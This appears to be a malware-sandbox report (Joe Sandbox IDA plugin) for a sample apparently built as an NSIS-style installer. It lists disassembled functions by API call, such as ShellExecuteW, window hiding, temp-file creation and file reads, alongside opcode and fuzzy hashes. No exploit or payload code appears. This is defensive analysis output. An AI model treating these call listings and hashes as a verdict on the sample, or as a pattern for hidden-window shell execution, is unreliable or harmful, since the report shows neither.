                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                    • String ID: <RM>$ReplicationWorry$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                    • API String ID: 247603264-1750368859
                                                                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                    • API String ID: 3156913733-2180253247
                                                                                                    • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                    • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                    • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: nsa
                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                    • String ID: HideWindow
                                                                                                    • API String ID: 1249568736-780306582
                                                                                                    • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                    • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                    APIs
                                                                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 3394109436-0
                                                                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 415043291-0
                                                                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,00406E81,?,?,?), ref: 00405E34
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
